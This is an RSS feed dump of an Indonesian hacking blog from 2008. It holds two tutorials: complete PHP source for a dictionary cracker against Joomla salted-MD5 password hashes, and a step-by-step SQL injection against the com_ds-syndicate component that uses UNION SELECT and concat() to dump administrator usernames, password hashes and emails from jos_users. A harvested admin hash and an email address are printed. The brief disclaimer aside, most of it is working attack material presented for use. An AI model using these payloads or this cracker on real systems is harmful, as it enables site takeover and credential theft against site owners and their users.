<p>ada sih HAck FS varian baru yaitu kita ga bs liat halaman Testiomonally kita karena dah di overlay kan ke web orang lain. temen2 aq banyak yang kena gitu aq juga kena kok</p>
<p>hehehe2X<br />
lain kali aja tapi tulisnya aq capek nih hehehe2X</p>
<p>thanks dah mau baca artikel jelek aq ini bye2X</p>
<p>by Admin</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/106/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/106/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/106/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=106&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/11/16/teknik-melindungi-fs-dari-tangan2-jahilby_anjar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>
	</item>
		<item>
		<title>Konsep sederhana Joomla Password Cracker.by_anjar</title>
		<link>http://koock.wordpress.com/2008/11/16/konsep-sederhana-joomla-password-crackerby_anjar/</link>
		<comments>http://koock.wordpress.com/2008/11/16/konsep-sederhana-joomla-password-crackerby_anjar/#comments</comments>
		<pubDate>Sun, 16 Nov 2008 05:22:56 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/?p=104</guid>
		<description><![CDATA[Posted By: Anjar Konsep sederhana Joomla Password Cracker 15-11-2008 &#124; 15:51:31 &#124; Halaman Ini dibaca 999 kali Apa yang akan penulis jelaskan disini, begitu juga dengan apa yang telah penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=104&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<td align="left">
<p>Posted By: <b>Anjar</b></p>
<p><font class="judul_content">
<div id="zzz">
<h1>
Konsep sederhana Joomla Password Cracker</h1>
</div>
<p></font><br />
15-11-2008 | 15:51:31 | Halaman Ini dibaca 999 kali</p>
<p></p>
<p><img src="http://www.networkandgame.890m.com/ilmuwebsite/hack/jomla2/joomla.jpg"><br />Apa<br />
yang akan penulis jelaskan disini, begitu juga dengan apa yang telah<br />
penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking<br />
tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di<br />
satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman,<br />
namun patut diketahui pula tidak ada sistem yang memiliki keamanan<br />
100%, selalu saja ada bolong yang masih dapat di eksploitasi, tapi<br />
setidaknya dapat meminimalisir serangan yang ada, dan di sisi lain yang<br />
akan penulis terangkan nanti tentunya cenderung digunakan untuk<br />
kegiatan vandalisme/merusak oleh beberapa pihak. Ya, tidak heran jika<br />
teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan<br />
ini. <span id="more-104"></span>Di satu sisi membangun tapi di sisi lain menghancurkan. Lantas<br />
yang harus di lakukan sekarang adalah, tetap waspada pada security risk<br />
yang ada, dan ketahuilah tamu tak diundang selalu menyempatkan waktunya<br />
untuk hadir memonitoring site anda, jika anda melakukan sedikit saja<br />
salah langkah akibatnya cukup fatal. </p>
<p>Waha&#8230; sepertinya intro<br />
tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari<br />
penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai<br />
lupa pada pokok pembahasan. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . </p>
<p>Ya, berdasarkan artikel<br />
sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan<br />
password sang administrator pada content management system seperti<br />
joomla, tapi masih terdapat satu masalah,&nbsp; dimana seorang attacker<br />
masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan<br />
password yang didapatkan itu masih dalam bentuk password yang<br />
terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk<br />
mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba<br />
menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu<br />
password asli yang terenkripsi, namun penulis hanya membatasi cracking<br />
password pada satu jenis hash saja, yaitu joomla hash password.<br />
Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma<br />
dekripsi password tetapi hanyalah penggunaan metode dictionary file,<br />
dimana untuk mendapatkan password asli cukup dilakukan pencocokan<br />
password dengan kamus data yang ada sehingga menghasilkan password yang<br />
sebenarnya. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . Namun setiap aplikasi selalu saja memiliki kekurangan,<br />
penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik<br />
sang Pencipta. <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  Kekurangannya adalah resource memori yang di butuhkan<br />
untuk metode seperti ini cenderung lebih besar dari ukuran biasanya. </p>
<p>Berikut adalah source code lengkap &#8216;simple joomla password cracker&#8217; : </p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;// cut here </p>
<p>&lt;HTML&gt;<br />&lt;HEAD&gt;<br />&lt;BASEFONT SIZE=3&gt;<br />&lt;TITLE&gt;::: Joomla Password Cracker :::&lt;/TITLE&gt;</p>
<p>&lt;/HEAD&gt;</p>
<p>&lt;BODY BGCOLOR=#000000 vlink=#0000FF&gt;</p>
<p>&lt;center&gt;<br />&lt;p align=&#8221;center&#8221;&gt;&lt;font face=&#8221;Verdana&#8221; size=&#8221;1&#8243;&gt;&lt;BR&gt;<br />&lt;/B&gt;&lt;BR&gt;<br />&nbsp; &lt;/font&gt;&lt;/p&gt;<br />&lt;p align=&#8221;center&#8221;&gt;&amp;nbsp;&lt;/p&gt;<br />&lt;p align=&#8221;center&#8221;&gt;&amp;nbsp;&lt;/p&gt;<br />&lt;TABLE BORDER=0 WIDTH=500 CELLPADDING=3 CELLSPACING=0&gt;<br />&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;p<br />
align=&#8221;center&#8221; style=&#8221;margin-top: 0&#8243;&gt;&lt;font color=&#8221;#FFFFFF&#8221;<br />
face=&#8221;Verdana&#8221; size=&#8221;2&#8243;&gt;&lt;u&gt;&lt;font<br />
size=&#8221;4&#8243;&gt;Simple&lt;/font&gt;&lt;/u&gt;<br />&lt;/font&gt;&lt;font<br />
size=&#8221;4&#8243;&gt;&lt;u&gt;&lt;font face=&#8221;Verdana&#8221;<br />
color=&#8221;#00FF00&#8243;&gt;&lt;strong&gt;Joomla&lt;/strong&gt;&lt;/font&gt;</p>
<p>&lt;font color=&#8221;#FFFFFF&#8221; face=&#8221;Verdana&#8221;&gt;Password<br />
Cracker&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;font<br />
size=&#8221;2&#8243;&gt;&lt;font color=&#8221;#FFFFFF&#8221; face=&#8221;Verdana&#8221;&gt;&lt;br&gt;<br />&lt;font<br />
color=&#8221;#00FF00&#8243;&gt;Developed by&lt;strong&gt; : ilmuwebsite.com<br />
&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;<br />&nbsp;&nbsp;&nbsp; &lt;/td&gt;<br />&lt;/tr&gt;<br />&lt;/table&gt;<br />&lt;!&#8211;&nbsp; Demonstration &#8211;&gt;<br />&lt;BODY&gt;<br />&lt;center&gt;<br />&nbsp; &lt;form action=index.php method=&#8221;POST&#8221;&gt;&lt;p&gt;<br />&nbsp;&nbsp;&nbsp; &lt;P&gt;<br />&lt;b&gt;<br />&lt;font<br />
size=&#8221;2&#8243; face=&#8221;Verdana&#8221; color=&#8221;#FFFFFF&#8221;&gt;&lt;u&gt;Masukkan&nbsp;</p>
<p>&lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;u&gt;&lt;font size=&#8221;2&#8243;<br />
face=&#8221;Verdana&#8221; color=&#8221;#FFFFFF&#8221;&gt;password hashnya disini<br />
:&lt;/font&gt;&lt;/u&gt;&lt;font size=&#8221;2&#8243; face=&#8221;Verdana&#8221;<br />
color=&#8221;#FFFFFF&#8221;&gt;&lt;/font&gt;&lt;font color=&#8221;#00FF00&#8243; size=&#8221;1&#8243;<br />
face=&#8221;Verdana&#8221;&gt;&lt;br&gt;<br />&lt;BR&gt;<br />&lt;input type=&#8221;text&#8221;<br />
name=&#8221;hash&#8221; size=55 style=&#8221;font-family: Verdana; font-size: 8pt; color:<br />
#00FF00; border: 1px solid #00FF00; background-color: #000000&#8243;&gt;<br />&lt;input<br />
type=&#8221;submit&#8221; name=&#8221;send&#8221; value=&#8221;Cari !!!&#8221; style=&#8221;font-family: Verdana;<br />
font-size: 8pt; color: #00FF00; border: 1px solid #00FF00;<br />
background-color: #000000&#8243;&gt;<br />&lt;/font&gt;<br />&lt;P&gt;&lt;br&gt;</p>
<p>&lt;/form&gt;<br />&nbsp; <br />&lt;?php<br />$hashes=array();<br />$i=0;<br />$parts=explode(&#8220;:&#8221;,$_POST['hash']); <br />$hashes[$i][0]=$parts[0];&nbsp; &nbsp;<br />$hashes[$i][1]=$parts[1];</p>
<p>if (ISSET($_POST['hash']))<br />{<br />$str = &#8221; &#8220;;<br />echo &#8220;&lt;font size=2 face=Verdana color=#FFFFFF&gt;&lt;u&gt;Started: &lt;/u&gt;&#8221;;<br />echo date(&#8220;F j, Y, g:i:s a&#8221;);</p>
<p>$lines = file(&#8216;kamus2.txt&#8217;);</p>
<p>foreach ($lines as $line_num =&gt; $line) <br />{<br />check($line); <br />}</p>
<p>$lines = file(&#8216;kamus1.txt&#8217;);</p>
<p>foreach ($lines as $line_num =&gt; $line) <br />{<br />check($line);<br />}</p>
<p>echo &#8220;&lt;br&gt;&lt;font size=2 face=Verdana color=#FFFFFF&gt;&lt;u&gt;Finished : &lt;/u&gt;&#8221;;<br />echo date(&#8220;F j, Y, g:i:s a&#8221;);</p>
<p>}</p>
<p>function check($a)<br />{&nbsp;&nbsp;&nbsp; &nbsp;<br />global&nbsp; $i;<br />$a=rtrim($a) ;</p>
<p>for($x=0;$x&lt;=$i;$x++)<br />{<br />global&nbsp; $hashes;</p>
<p>if (md5($a.$hashes[$x][1]) === $hashes[$x][0])<br />{ <br />echo<br />
&#8220;&lt;font size=2 face=Verdana<br />
color=#FFFFFF&gt;&lt;br&gt;&lt;br&gt;&lt;u&gt;The password is :</p>
<p>&lt;/u&gt;&lt;/font&gt;&lt;font size=2 face=Verdana<br />
color=#00FF00&gt;&lt;h1&gt;$a&lt;/h1&gt;&lt;/font&gt;&#8221;; <br />echo &#8220;&lt;u&gt;Ended: &lt;/u&gt;&#8221;;<br />echo date(&#8220;F j, Y, g:i:s a&#8221;);<br />}</p>
<p>}<br />&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; &nbsp;<br />}<br />?&gt;<br />&lt;font<br />
size=&#8221;2&#8243; face=&#8221;Verdana&#8221;<br />
color=&#8221;#FFFFFF&#8221;&gt;&lt;u&gt;&lt;br&gt;&lt;br&gt;Tolong di kembangkan ya<br />
?! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  &lt;/u&gt;&lt;/font&gt;<br />&lt;/center&gt;<br />&lt;/body&gt;&lt;/html&gt;</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;// cut here </p>
<p>Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini : <br />memory_limit = 32M ;</p>
<p><img src="http://www.networkandgame.890m.com/ilmuwebsite/hack/jomla2/memorilimit.jpg"></p>
<p>menjadi &gt; 32, penulis menggantinya menjadi :<br />memory_limit = 256M ;</p>
<p>Ya,<br />
sebelum berlanjut, penulis akan membahas struktur password joomla yang<br />
terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri<br />
dari hash dan salt.&nbsp; Standar enkripsi joomla biasanya berbentuk seperti<br />
ini :</p>
<p>b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK</p>
<p>Hashnya<br />
itu terdapat pada bagian yang pertama yaitu<br />
b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir<br />
9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua &#8220;:&#8221;.<br />
Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian<br />
password sesungguhnya. <br />Yang ditemukan disini adalah jika password<br />
berbentuk plain text di gabung dengan saltnya maka akan menghasilkan<br />
hash password joomla. Dengan kata lain jika : x + salt = hash joomla.<br />
Sehingga jika di implementasikan melalui enkripsi md5 : </p>
<p>md5(x + salt) = hash &nbsp;</p>
<p>maka :</p>
<p>md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116</p>
<p>berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  huehuehuehehe&#8230;&nbsp; )</p>
<p>Ya seperti pada baris kalimat ini : </p>
<p>&#8230;<br />if (md5($a.$hashes[$x][1]) === $hashes[$x][0])<br />{ <br />echo<br />
&#8220;&lt;font size=2 face=Verdana<br />
color=#FFFFFF&gt;&lt;br&gt;&lt;br&gt;&lt;u&gt;The password is :</p>
<p>&lt;/u&gt;&lt;/font&gt;&lt;font size=2 face=Verdana<br />
color=#00FF00&gt;&lt;h1&gt;$a&lt;/h1&gt;&lt;/font&gt;&#8221;; <br />&#8230;</p>
<p>Dan hasilnya adalah &#8230;<br /><img src="http://www.networkandgame.890m.com/ilmuwebsite/hack/jomla2/result.jpg"></p>
<p> <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> ~~</p>
<p>Penulis<br />
yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya<br />
pun cukup mudah. Script lengkap dan kamus passwordnya dapat <a href="http://www.networkandgame.890m.com/ilmuwebsite/hack/jomla2/brute.zip" target="_self">di download di sini</a> &#8230; <br />Selamat mencoba. Selamat mengembangkan ! <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Greetz<br />
for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli,<br />
safril, dr.emi, husniearif, [H], dan ilmuwebsite community.</td>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/104/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/104/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/104/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/104/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/104/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/104/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/104/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/104/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/104/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/104/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/104/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/104/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/104/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/104/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=104&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/11/16/konsep-sederhana-joomla-password-crackerby_anjar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>

		<media:content url="http://www.networkandgame.890m.com/ilmuwebsite/hack/jomla2/joomla.jpg" medium="image" />

		<media:content url="http://www.networkandgame.890m.com/ilmuwebsite/hack/jomla2/memorilimit.jpg" medium="image" />

		<media:content url="http://www.networkandgame.890m.com/ilmuwebsite/hack/jomla2/result.jpg" medium="image" />
	</item>
		<item>
		<title>Implementasi SQL Injection pada Joomla.by_anjar</title>
		<link>http://koock.wordpress.com/2008/11/16/implementasi-sql-injection-pada-joomlaby_anjar/</link>
		<comments>http://koock.wordpress.com/2008/11/16/implementasi-sql-injection-pada-joomlaby_anjar/#comments</comments>
		<pubDate>Sun, 16 Nov 2008 05:20:36 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/?p=101</guid>
		<description><![CDATA[Posted By: Anjar Implementasi SQL Injection pada Joomla 28-10-2008 &#124; 10:25:41 &#124; Halaman Ini dibaca 1775 kali Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika &#8216;the choosen one&#8217; ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=101&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<td align="left">
<p>Posted By: <b>Anjar</b></p>
<p><font class="judul_content">
<div id="zzz">
<h1>
Implementasi SQL Injection pada Joomla</h1>
</div>
<p></font><br />
28-10-2008 | 10:25:41 | Halaman Ini dibaca 1775 kali</p>
<p>	<img src="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/joomla.jpg"><br />Apa<br />
jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin<br />
tidak memperhatikan security risk yang ada? Apa jadinya jika &#8216;the<br />
choosen one&#8217; ternyata seorang admin yang tidak tahu sama sekali<br />
mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang<br />
ada admin yang meremehkan system keamanan. Apa jadinya jika server anda<br />
memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang<br />
akibat dari hasil penggabungan dua kata tersebut. <span id="more-101"></span>Yang terjadi adalah<br />
peluang seorang attacker untuk menyusup ke dalam website anda semakin&nbsp;<br />
memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang<br />
attacker mengambil profit dari exploitasi system yang ada. Dalam<br />
berbagai hal, termasuk mendulang dollar dengan cara tidak halal.<br />
Seperti yang dilakukan oleh para carder. </p>
<p>Penulis akan<br />
menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan<br />
bermodalkan internet dan browser internet tentunya, dan sedikit<br />
pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang<br />
manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan<br />
data. </p>
<p>Ya, belum lama ini, salah satu component joomla terbukti<br />
mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh<br />
tubuh, dan berakibat kematian pada akhirnya. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> ~~ </p>
<p>Telah<br />
ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah<br />
satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla.<br />
Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan<br />
filtering sql yang ketat dalam variable feed_id. Penyusupan dapat<br />
dilakukan, sederhananya ini terjadi karena kesalahan dari variable<br />
feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki<br />
kecacatan seperti ini.&nbsp; </p>
<p>Ya, Langsung aja &#8230; </p>
<p>http:// korban.com/index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1</p>
<p><img src="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/feed.JPG"><br />Url<br />
ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes<br />
kelemahannya, dengan penambahan tanda kutip ( &#8216; ) di belakangnya. </p>
<p>http:// korban.com/index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1&#8242;</p>
<p><img src="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/errror.JPG"><br />Apa yang terjadi ? &#8230; error&#8230;</p>
<p>Langkah<br />
selanjutnya adalah cari urutan&nbsp; si table &#8216;dssyndicate_feeds&#8217;&nbsp; dengan<br />
mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan<br />
error yang berbeda&nbsp; : </p>
<p>index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+order+by+1/*&nbsp;&nbsp;&nbsp; &#8211;&gt;&nbsp;&nbsp;&nbsp; errornya sama <br />index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+order+by+2/*&nbsp;&nbsp;&nbsp; &#8211;&gt;&nbsp;&nbsp;&nbsp; errornya sama <br />index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+order+by+3/*&nbsp;&nbsp;&nbsp; &#8211;&gt;&nbsp;&nbsp;&nbsp; errornya sama<br />index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+order+by+4/*&nbsp;&nbsp;&nbsp; &#8211;&gt;&nbsp;&nbsp;&nbsp; errornya sama <br />index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+order+by+20/*&nbsp;&nbsp;&nbsp; &#8211;&gt;&nbsp;&nbsp;&nbsp; errornya sama <br />…<br />index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+order+by+21/*&nbsp;&nbsp;&nbsp; &#8211;&gt;&nbsp;&nbsp;&nbsp; errornya berbeda</p>
<p>perhatikan<br />
bentuk error-nya berbeda ketika feed_id yang diisi dengan<br />
1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang<br />
selanjutnya. </p>
<p>Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini. </p>
<p>Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban. <br />index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,<br />15,16,17,18,19,20+from+jos_users</p>
<p>lihat paling akhir dari baris tersebut, <br />from+jos_users</p>
<p>jos_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user. <br />Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini&nbsp; diperoleh berdasarkan yang telah penulis jelaskan sebelumnya. </p>
<p>Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut, <br /><img src="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/download.jpg"></p>
<p>Setelah<br />
itu buka file yang baru didownload tersebut dengan editor seperti<br />
notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk<br />
membukanya dengan notepad, tidak dengan browser internet, karena<br />
memudahkan untuk pembacaan hasil dari sql injection yang telah<br />
dilakukan. </p>
<p><img src="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/angka2.jpg"><br />Lihat angka 2 di dalam tag &lt;title&gt; : </p>
<p>&lt;title&gt;2 (18)&lt;/title&gt;</p>
<p>Jangan<br />
pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah<br />
angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan<br />
browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan<br />
selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain<br />
untuk menggunakannya seperti melihat versi mysql yang digunakan, ya<br />
langsung saja, kita akan mencobanya untuk melihat versi mysql yang<br />
digunakan oleh si korban. Gunakan url ini &#8230; </p>
<p>http://korban.com/hack/joomla/index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+union+all+select+1,<br />@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from<br />+jos_users</p>
<p><img src="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/title.jpg"><br />perhatikan<br />
angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali<br />
file telah di download dengan notepad, apa yang terjadi ? title berubah<br />
menjadi versi si mysql, yang penulis dapatkan : </p>
<p>&lt;title&gt;5.0.33 (18)&lt;/title&gt;</p>
<p>Mysql<br />
versi 5.0.33 <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> , sampai sini anda telah dapat eksplorasi database user<br />
dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya,<br />
mendapatkan username dan password si admin. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . </p>
<p>Pengambilan<br />
username dan password secara paksa menggunakan sql injection ini dapat<br />
dilakukan secara satu persatu, ataupun sekaligus. Query untuk<br />
menampilkan username menggunakan bug sql injection yang satu ini, anda<br />
cukup mengganti @@version yang tadi dengan field yang menyimpan<br />
informasi username tentunya, gunakan url ini : </p>
<p>http://korban.com/hack/joomla/index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+union+all+select+1,<br />username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users</p>
<p>jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut &#8230; </p>
<p>&lt;title&gt;admin (18)&lt;/title&gt;</p>
<p>Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini : </p>
<p>http://korban.com/hack/joomla/index2.php?option=ds-syndicate&amp;version=1&amp;feed_id=1+union+all+select+1,<br />concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,<br />4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users</p>
<p>perhatikan,<br />
string username, diganti dengan<br />
concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan<br />
concat disini adalah mengconvert suatu hexa, ataupun spesial karakter<br />
kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah : </p>
<p>0x3a<br />
berubah menjadi titik dua ( : ), buka kembali file hasil dari url di<br />
atas. Yang penulis dapatkan adalah informasi seperti ini : </p>
<p><img src="http://networkandgame.890m.com/ilmuwebsite/hack/joomla/usernamepassword.jpg"><br />admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator</p>
<p>Jika di urutkan : <br />Username : admin<br />Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK<br />Email : alkemail@gmail.com<br />User type : Super Administrator</p>
<p>Yang<br />
di lakukan selanjutnya adalah mencoba crack password, karena itu masih<br />
dalam bentuk hash, dengan kata lain password yang masih terenkripsi.&nbsp;</p>
<p> <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . Yups, pengambilan username dan password secara paksa telah terjadi,<br />
si attacker kembali mencari cara bagaimana mendapatkan password yang<br />
asli, dengan cara mengcrack password hash tersebut. </p>
<p>Inilah<br />
bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari<br />
seorang admin yang malas melakukan patch pada systemnya. </p>
<p>Di<br />
artikel selanjutnya penulis akan menjalankan konsep sederhana password<br />
crack untuk joomla menggunakan php. Tunggu kelanjutannya &#8230; <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> . </p>
